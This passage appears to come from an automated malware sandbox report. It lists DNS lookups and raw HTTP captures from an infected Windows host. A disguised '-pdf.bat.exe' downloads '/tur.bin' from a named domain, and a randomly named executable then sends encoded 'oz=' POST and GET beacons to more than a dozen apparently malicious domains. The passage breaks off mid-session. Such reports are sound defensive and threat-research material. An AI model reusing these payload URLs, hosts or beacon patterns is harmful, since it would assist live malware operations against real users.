                                                                                                                                              Oct 4, 2024 08:07:45.845398903 CEST1.1.1.1192.168.11.200x4869No error (0)dfmagazine.shop84.32.84.32A (IP address)IN (0x0001)false
                                                                                                                                              Oct 4, 2024 08:07:59.225184917 CEST1.1.1.1192.168.11.200xdafcNo error (0)www.ngmr.xyz54.67.87.110A (IP address)IN (0x0001)false
                                                                                                                                              Oct 4, 2024 08:08:12.953572035 CEST1.1.1.1192.168.11.200x2f70No error (0)www.albero-dveri.online194.58.112.174A (IP address)IN (0x0001)false
                                                                                                                                              Oct 4, 2024 08:08:26.914175987 CEST1.1.1.1192.168.11.200xfff2No error (0)www.typ67.toptyp67.topCNAME (Canonical name)IN (0x0001)false
                                                                                                                                              Oct 4, 2024 08:08:26.914175987 CEST1.1.1.1192.168.11.200xfff2No error (0)typ67.top38.47.207.146A (IP address)IN (0x0001)false
                                                                                                                                              Oct 4, 2024 08:08:41.326567888 CEST1.1.1.1192.168.11.200xc919No error (0)www.greekhause.orggreekhause.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                              Oct 4, 2024 08:08:41.326567888 CEST1.1.1.1192.168.11.200xc919No error (0)greekhause.org3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                                              Oct 4, 2024 08:08:41.326567888 CEST1.1.1.1192.168.11.200xc919No error (0)greekhause.org15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                                              Oct 4, 2024 08:08:54.606975079 CEST1.1.1.1192.168.11.200x9fa5No error (0)www.dorikis.online162.213.249.216A (IP address)IN (0x0001)false
                                                                                                                                              Oct 4, 2024 08:09:08.186542988 CEST1.1.1.1192.168.11.200xd15bNo error (0)www.platinumkitchens.infoplatinumkitchens.infoCNAME (Canonical name)IN (0x0001)false
                                                                                                                                              Oct 4, 2024 08:09:08.186542988 CEST1.1.1.1192.168.11.200xd15bNo error (0)platinumkitchens.info3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                                              Oct 4, 2024 08:09:08.186542988 CEST1.1.1.1192.168.11.200xd15bNo error (0)platinumkitchens.info15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                                              Oct 4, 2024 08:09:21.420059919 CEST1.1.1.1192.168.11.200xae86No error (0)www.dhkatp.vipdhkatp.vipCNAME (Canonical name)IN (0x0001)false
                                                                                                                                              Oct 4, 2024 08:09:21.420059919 CEST1.1.1.1192.168.11.200xae86No error (0)dhkatp.vip3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                                              Oct 4, 2024 08:09:21.420059919 CEST1.1.1.1192.168.11.200xae86No error (0)dhkatp.vip15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                                              Oct 4, 2024 08:09:41.716272116 CEST1.1.1.1192.168.11.200x4ef0No error (0)www.tempatmudisini01.clicktempatmudisini01.clickCNAME (Canonical name)IN (0x0001)false
                                                                                                                                              Oct 4, 2024 08:09:41.716272116 CEST1.1.1.1192.168.11.200x4ef0No error (0)tempatmudisini01.click103.21.221.4A (IP address)IN (0x0001)false
                                                                                                                                              Oct 4, 2024 08:09:57.306046963 CEST1.1.1.1192.168.11.200x4233No error (0)www.komart.shopkomart.shopCNAME (Canonical name)IN (0x0001)false
                                                                                                                                              Oct 4, 2024 08:09:57.306046963 CEST1.1.1.1192.168.11.200x4233No error (0)komart.shop133.130.35.90A (IP address)IN (0x0001)false
                                                                                                                                              Oct 4, 2024 08:09:57.687583923 CEST9.9.9.9192.168.11.200x4233No error (0)www.komart.shopkomart.shopCNAME (Canonical name)IN (0x0001)false
                                                                                                                                              Oct 4, 2024 08:09:57.687583923 CEST9.9.9.9192.168.11.200x4233No error (0)komart.shop133.130.35.90A (IP address)IN (0x0001)false
                                                                                                                                              Oct 4, 2024 08:10:11.433711052 CEST1.1.1.1192.168.11.200xf190No error (0)www.dxeg.lola22.dxzz.topCNAME (Canonical name)IN (0x0001)false
                                                                                                                                              Oct 4, 2024 08:10:11.433711052 CEST1.1.1.1192.168.11.200xf190No error (0)a22.dxzz.topdxzz.topCNAME (Canonical name)IN (0x0001)false
                                                                                                                                              Oct 4, 2024 08:10:11.433711052 CEST1.1.1.1192.168.11.200xf190No error (0)dxzz.top137.175.33.56A (IP address)IN (0x0001)false
                                                                                                                                              Oct 4, 2024 08:10:25.093424082 CEST1.1.1.1192.168.11.200xd63eNo error (0)www.tukaari.shoptukaari.shopCNAME (Canonical name)IN (0x0001)false
                                                                                                                                              Oct 4, 2024 08:10:25.093424082 CEST1.1.1.1192.168.11.200xd63eNo error (0)tukaari.shop3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                                              Oct 4, 2024 08:10:25.093424082 CEST1.1.1.1192.168.11.200xd63eNo error (0)tukaari.shop15.197.148.33A (IP address)IN (0x0001)false

                                                                                                                                              HTTP Request Dependency Graph

                                                                                                                                              • fredy.ee
                                                                                                                                              • www.invicta.world
                                                                                                                                              • www.whats-in-the-box.org
                                                                                                                                              • www.linkwave.cloud
                                                                                                                                              • www.dfmagazine.shop
                                                                                                                                              • www.ngmr.xyz
                                                                                                                                              • www.albero-dveri.online
                                                                                                                                              • www.typ67.top
                                                                                                                                              • www.greekhause.org
                                                                                                                                              • www.dorikis.online
                                                                                                                                              • www.platinumkitchens.info
                                                                                                                                              • www.dhkatp.vip
                                                                                                                                              • www.tempatmudisini01.click
                                                                                                                                              • www.komart.shop
                                                                                                                                              • www.dxeg.lol
                                                                                                                                              • www.tukaari.shop

                                                                                                                                              HTTP Packets

                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              0192.168.11.2049727185.86.211.136802236C:\Users\user\Desktop\-pdf.bat.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Oct 4, 2024 08:06:04.521403074 CEST160OUTGET /tur.bin HTTP/1.1
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                                              Host: fredy.ee
                                                                                                                                              Cache-Control: no-cache
                                                                                                                                              Oct 4, 2024 08:06:04.714046955 CEST421INHTTP/1.1 301 Moved Permanently
                                                                                                                                              Date: Fri, 04 Oct 2024 06:06:04 GMT
                                                                                                                                              Server: Apache
                                                                                                                                              Location: https://fredy.ee/tur.bin
                                                                                                                                              Content-Length: 232
                                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 72 65 64 79 2e 65 65 2f 74 75 72 2e 62 69 6e 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://fredy.ee/tur.bin">here</a>.</p></body></html>


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              1192.168.11.204973113.248.169.48804180C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Oct 4, 2024 08:07:03.920676947 CEST548OUTGET /tcs6/?oz=UTr2VQMVaNknAPhv8pO5HUt/aSD/OuAvYfufonxWcuzqKYzjt00ESHNOp8OZd4NYpPhYAhKEfFByAl9/w+FcumGXOFp58MMDhVPqk9564kxN8Oc8kW08N+s=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.invicta.world
                                                                                                                                              Connection: close
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Oct 4, 2024 08:07:04.025481939 CEST399INHTTP/1.1 200 OK
                                                                                                                                              Server: openresty
                                                                                                                                              Date: Fri, 04 Oct 2024 06:07:03 GMT
                                                                                                                                              Content-Type: text/html
                                                                                                                                              Content-Length: 259
                                                                                                                                              Connection: close
                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6f 7a 3d 55 54 72 32 56 51 4d 56 61 4e 6b 6e 41 50 68 76 38 70 4f 35 48 55 74 2f 61 53 44 2f 4f 75 41 76 59 66 75 66 6f 6e 78 57 63 75 7a 71 4b 59 7a 6a 74 30 30 45 53 48 4e 4f 70 38 4f 5a 64 34 4e 59 70 50 68 59 41 68 4b 45 66 46 42 79 41 6c 39 2f 77 2b 46 63 75 6d 47 58 4f 46 70 35 38 4d 4d 44 68 56 50 71 6b 39 35 36 34 6b 78 4e 38 4f 63 38 6b 57 30 38 4e 2b 73 3d 26 55 4a 39 3d 71 4e 2d 6c 6c 54 4b 50 48 78 6e 74 50 72 76 30 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?oz=UTr2VQMVaNknAPhv8pO5HUt/aSD/OuAvYfufonxWcuzqKYzjt00ESHNOp8OZd4NYpPhYAhKEfFByAl9/w+FcumGXOFp58MMDhVPqk9564kxN8Oc8kW08N+s=&UJ9=qN-llTKPHxntPrv0"}</script></head></html>


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              2192.168.11.20497323.33.130.190804180C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Oct 4, 2024 08:07:19.362390041 CEST831OUTPOST /bqye/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.whats-in-the-box.org
                                                                                                                                              Origin: http://www.whats-in-the-box.org
                                                                                                                                              Referer: http://www.whats-in-the-box.org/bqye/
                                                                                                                                              Content-Length: 199
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Data Raw: 6f 7a 3d 6c 70 70 32 47 39 77 5a 4a 51 53 30 4d 6c 47 52 73 57 6e 56 74 53 54 63 32 4f 6f 75 6a 4a 64 50 73 38 74 7a 34 4c 55 47 55 70 38 35 6f 49 55 7a 7a 4a 50 63 39 55 74 45 35 62 38 6c 50 75 44 38 6f 31 37 51 74 59 6c 45 2b 2b 57 6a 77 4b 50 52 69 55 66 45 71 75 6f 31 38 63 45 67 55 31 56 39 32 6b 58 78 75 31 47 54 4f 57 6c 39 32 4a 36 4c 31 50 57 54 4e 75 42 59 6e 37 43 46 2f 6d 4b 2b 65 37 4f 44 69 74 51 5a 52 79 72 55 62 75 70 41 54 43 76 51 55 56 58 78 4f 79 67 69 57 57 6f 61 54 68 34 4c 6c 77 53 6a 70 35 4f 5a 50 45 7a 46 4a 34 49 49 6d 72 68 70 77 4a 4f 66 48 59 50 30 63 77 3d 3d
                                                                                                                                              Data Ascii: oz=lpp2G9wZJQS0MlGRsWnVtSTc2OoujJdPs8tz4LUGUp85oIUzzJPc9UtE5b8lPuD8o17QtYlE++WjwKPRiUfEquo18cEgU1V92kXxu1GTOWl92J6L1PWTNuBYn7CF/mK+e7ODitQZRyrUbupATCvQUVXxOygiWWoaTh4LlwSjp5OZPEzFJ4IImrhpwJOfHYP0cw==


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              3192.168.11.20497333.33.130.190804180C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Oct 4, 2024 08:07:21.996279955 CEST851OUTPOST /bqye/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.whats-in-the-box.org
                                                                                                                                              Origin: http://www.whats-in-the-box.org
                                                                                                                                              Referer: http://www.whats-in-the-box.org/bqye/
                                                                                                                                              Content-Length: 219
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Data Raw: 6f 7a 3d 6c 70 70 32 47 39 77 5a 4a 51 53 30 4e 47 65 52 70 31 66 56 72 79 54 66 7a 4f 6f 75 71 70 64 4c 73 38 68 7a 34 4b 52 44 55 37 49 35 6d 4e 6f 7a 79 49 50 63 78 30 74 45 33 37 38 67 4c 75 44 6e 6f 31 6d 76 74 59 4a 45 2b 2b 43 6a 77 4c 2f 52 6c 6c 66 44 72 2b 6f 72 30 38 45 69 62 56 56 39 32 6b 58 78 75 78 72 2b 4f 57 39 39 32 5a 6d 4c 31 75 57 55 54 2b 42 62 7a 72 43 46 75 32 4c 33 65 37 4f 6c 69 6f 49 2f 52 77 6a 55 62 73 78 41 53 54 76 54 42 6c 58 33 4b 79 67 31 5a 58 31 55 66 46 4e 36 6c 44 76 77 6a 4d 32 74 44 79 69 66 55 4b 38 73 6c 34 39 62 30 35 33 33 46 61 4f 76 42 2b 4c 69 62 47 41 62 30 52 52 4d 32 65 51 58 55 67 4e 6b 4d 76 34 3d
                                                                                                                                              Data Ascii: oz=lpp2G9wZJQS0NGeRp1fVryTfzOouqpdLs8hz4KRDU7I5mNozyIPcx0tE378gLuDno1mvtYJE++CjwL/RllfDr+or08EibVV92kXxuxr+OW992ZmL1uWUT+BbzrCFu2L3e7OlioI/RwjUbsxASTvTBlX3Kyg1ZX1UfFN6lDvwjM2tDyifUK8sl49b0533FaOvB+LibGAb0RRM2eQXUgNkMv4=


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              4192.168.11.20497343.33.130.190804180C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Oct 4, 2024 08:07:24.634145975 CEST1289OUTPOST /bqye/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.whats-in-the-box.org
                                                                                                                                              Origin: http://www.whats-in-the-box.org
                                                                                                                                              Referer: http://www.whats-in-the-box.org/bqye/
                                                                                                                                              Content-Length: 7367
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Data Raw: 6f 7a 3d 6c 70 70 32 47 39 77 5a 4a 51 53 30 4e 47 65 52 70 31 66 56 72 79 54 66 7a 4f 6f 75 71 70 64 4c 73 38 68 7a 34 4b 52 44 55 37 77 35 6d 2f 77 7a 30 72 58 63 77 30 74 45 2f 62 38 68 4c 75 44 6d 6f 31 2f 6d 74 59 55 7a 2b 38 36 6a 78 6f 6e 52 6b 52 7a 44 6c 2b 6f 72 32 38 45 6e 55 31 55 35 32 6b 48 39 75 31 4c 2b 4f 57 39 39 32 59 57 4c 69 76 57 55 52 2b 42 59 6e 37 43 42 2f 6d 4c 66 65 2f 62 51 69 6f 38 4a 45 51 44 55 61 4d 68 41 65 42 33 54 64 31 58 31 48 53 68 77 5a 58 35 66 66 45 6b 4c 6c 43 61 74 6a 4c 71 74 41 48 44 2f 4d 70 63 57 7a 36 46 46 78 4d 66 34 4f 73 4b 66 42 75 72 63 62 58 59 6f 34 68 31 67 6f 4e 64 44 45 6c 42 54 50 6f 74 4e 6b 6f 75 4c 52 6a 4a 78 36 70 67 44 62 36 72 74 67 58 2f 2f 2f 34 6f 34 53 37 6a 30 62 31 75 78 4e 78 61 50 6d 6b 6e 58 77 73 39 4f 50 64 65 4a 50 62 51 30 67 45 41 63 74 39 77 74 70 6e 6f 42 73 6c 57 67 71 7a 79 49 70 45 55 36 51 34 69 4b 33 6f 6a 38 65 44 63 51 59 6c 56 32 62 38 37 46 67 63 57 77 6e 31 31 35 50 6c 4b 6e 58 71 74 63 6b 64 73 70 6b 67 57 [TRUNCATED]
                                                                                                                                              Data Ascii: oz=lpp2G9wZJQS0NGeRp1fVryTfzOouqpdLs8hz4KRDU7w5m/wz0rXcw0tE/b8hLuDmo1/mtYUz+86jxonRkRzDl+or28EnU1U52kH9u1L+OW992YWLivWUR+BYn7CB/mLfe/bQio8JEQDUaMhAeB3Td1X1HShwZX5ffEkLlCatjLqtAHD/MpcWz6FFxMf4OsKfBurcbXYo4h1goNdDElBTPotNkouLRjJx6pgDb6rtgX///4o4S7j0b1uxNxaPmknXws9OPdeJPbQ0gEAct9wtpnoBslWgqzyIpEU6Q4iK3oj8eDcQYlV2b87FgcWwn115PlKnXqtckdspkgWaYtpNZxGrItuVWT9U0lS2bJDCyxnFIawQymokwNRjZg7AoHZwhBaIypjKqDJKioopZfKPRCidH4chjWmHpNlO3VAvdBJw4G8fY02vTE6LIj8HYvfewthROU3O06S/pyoi3LC7VW3istNYabDT8UPkxsAgMZSY7wy56LCNsDBRXAE+ceAJ8zdLCDzI+H8XMvukChrocE09oJQI9IYc32LXb2EC+hm0I4p1rEQ1esYbZ8xOavW/9SCEoWzba5Fx+0lWtfOQAeXTTD99lCFcB6jo4oZlgrUqR/AwNzqfVAv9t8R0KiHbPVTBNYfTSocBP
                                                                                                                                              Oct 4, 2024 08:07:24.634196043 CEST3867OUTData Raw: 39 37 6c 45 79 38 6a 46 4f 45 61 32 53 55 71 55 4a 6b 37 6b 33 63 63 39 58 62 77 6a 55 42 2f 7a 55 6f 67 4d 59 2b 51 6c 56 5a 6e 62 6f 2f 56 55 51 50 72 79 46 32 48 77 69 69 30 77 4e 32 55 49 34 2f 64 51 68 6d 4d 6c 46 77 6d 6e 41 2f 6e 64 66 46
                                                                                                                                              Data Ascii: 97lEy8jFOEa2SUqUJk7k3cc9XbwjUB/zUogMY+QlVZnbo/VUQPryF2Hwii0wN2UI4/dQhmMlFwmnA/ndfFgnz4L+Ddl4aNaAkOoVQ+Cj/LL+Cgz78fUHc9xjzjwrxikx7672XlS6EKj9vLCWAdLVIHgA8Pm9EQimEQ4aFHwzHmrJVEfj8qrVVtJVyHUFx9NCO48hlFec51qBrFBstZwcDaOczsja2su+YSidREVp5ic3Gz4wFSU
                                                                                                                                              Oct 4, 2024 08:07:24.634243965 CEST2844OUTData Raw: 37 4a 4d 50 33 43 36 56 41 6f 6b 75 50 69 54 69 42 7a 70 57 77 72 43 7a 36 56 36 43 4b 61 63 75 75 50 4d 66 39 79 56 54 4d 5a 4f 67 69 74 73 4e 4d 4a 6b 54 34 5a 39 71 65 70 70 5a 4c 67 43 63 6c 53 38 48 43 62 55 74 7a 59 31 2b 4e 50 70 34 38 63
                                                                                                                                              Data Ascii: 7JMP3C6VAokuPiTiBzpWwrCz6V6CKacuuPMf9yVTMZOgitsNMJkT4Z9qeppZLgCclS8HCbUtzY1+NPp48cyuGmE27/Vgnb8yoiJnAtKBUX0XwM2dRun7SlNWgtfp4BSNrECmMulH7ud0it8z99NpMjfBmy5m110rwVp5ddfeeBcIeej0vvHlt3u5/OxdjqMAH0aSgw6mPt7WGbslufEWxKWAGvq2ZWu8wUFajM0ABsJQ+Y/8VSd


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              5192.168.11.20497353.33.130.190804180C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Oct 4, 2024 08:07:27.273075104 CEST555OUTGET /bqye/?UJ9=qN-llTKPHxntPrv0&oz=orBWFM4TMH6bEQWb0mufnyz8+/9zteVW//lS5P1UVpZ6i4UA1urKkBRolapSd+D0qVvV/pdb4OKcqrb8qmiU7f8Sw/VtSC1B9WeqmjWWYlIhrofH/7u6E+o= HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.whats-in-the-box.org
                                                                                                                                              Connection: close
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Oct 4, 2024 08:07:27.376599073 CEST399INHTTP/1.1 200 OK
                                                                                                                                              Server: openresty
                                                                                                                                              Date: Fri, 04 Oct 2024 06:07:27 GMT
                                                                                                                                              Content-Type: text/html
                                                                                                                                              Content-Length: 259
                                                                                                                                              Connection: close
                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 55 4a 39 3d 71 4e 2d 6c 6c 54 4b 50 48 78 6e 74 50 72 76 30 26 6f 7a 3d 6f 72 42 57 46 4d 34 54 4d 48 36 62 45 51 57 62 30 6d 75 66 6e 79 7a 38 2b 2f 39 7a 74 65 56 57 2f 2f 6c 53 35 50 31 55 56 70 5a 36 69 34 55 41 31 75 72 4b 6b 42 52 6f 6c 61 70 53 64 2b 44 30 71 56 76 56 2f 70 64 62 34 4f 4b 63 71 72 62 38 71 6d 69 55 37 66 38 53 77 2f 56 74 53 43 31 42 39 57 65 71 6d 6a 57 57 59 6c 49 68 72 6f 66 48 2f 37 75 36 45 2b 6f 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?UJ9=qN-llTKPHxntPrv0&oz=orBWFM4TMH6bEQWb0mufnyz8+/9zteVW//lS5P1UVpZ6i4UA1urKkBRolapSd+D0qVvV/pdb4OKcqrb8qmiU7f8Sw/VtSC1B9WeqmjWWYlIhrofH/7u6E+o="}</script></head></html>


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              6192.168.11.20497363.33.130.190804180C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Oct 4, 2024 08:07:32.609239101 CEST813OUTPOST /was5/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.linkwave.cloud
                                                                                                                                              Origin: http://www.linkwave.cloud
                                                                                                                                              Referer: http://www.linkwave.cloud/was5/
                                                                                                                                              Content-Length: 199
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Data Raw: 6f 7a 3d 2f 2b 6b 48 41 43 61 36 58 44 48 61 6c 65 36 42 72 79 31 32 49 49 7a 76 78 62 54 6d 6b 6d 30 2b 49 54 30 42 30 67 6f 64 66 4e 72 4c 53 31 64 45 77 48 43 74 32 30 30 41 57 68 45 76 55 76 44 67 49 56 48 66 66 45 6b 7a 34 4a 64 73 30 34 39 7a 45 71 54 33 52 51 53 66 6d 78 2b 4f 49 55 6e 76 6a 6f 61 74 4d 52 62 38 62 41 33 6d 59 4f 6c 33 45 6b 51 6f 6e 45 51 67 63 37 52 32 46 78 2b 6f 38 43 53 68 43 6c 6b 56 63 2f 30 57 61 58 31 6b 6e 7a 73 30 39 63 55 6c 6a 72 6c 4e 78 39 58 52 2f 53 6f 62 56 45 38 6e 44 76 36 73 41 33 33 50 30 68 49 61 64 43 69 4e 57 53 42 79 71 38 52 43 55 67 3d 3d
                                                                                                                                              Data Ascii: oz=/+kHACa6XDHale6Bry12IIzvxbTmkm0+IT0B0godfNrLS1dEwHCt200AWhEvUvDgIVHffEkz4Jds049zEqT3RQSfmx+OIUnvjoatMRb8bA3mYOl3EkQonEQgc7R2Fx+o8CShClkVc/0WaX1knzs09cUljrlNx9XR/SobVE8nDv6sA33P0hIadCiNWSByq8RCUg==


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              7192.168.11.20497373.33.130.190804180C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Oct 4, 2024 08:07:35.240950108 CEST833OUTPOST /was5/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.linkwave.cloud
                                                                                                                                              Origin: http://www.linkwave.cloud
                                                                                                                                              Referer: http://www.linkwave.cloud/was5/
                                                                                                                                              Content-Length: 219
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
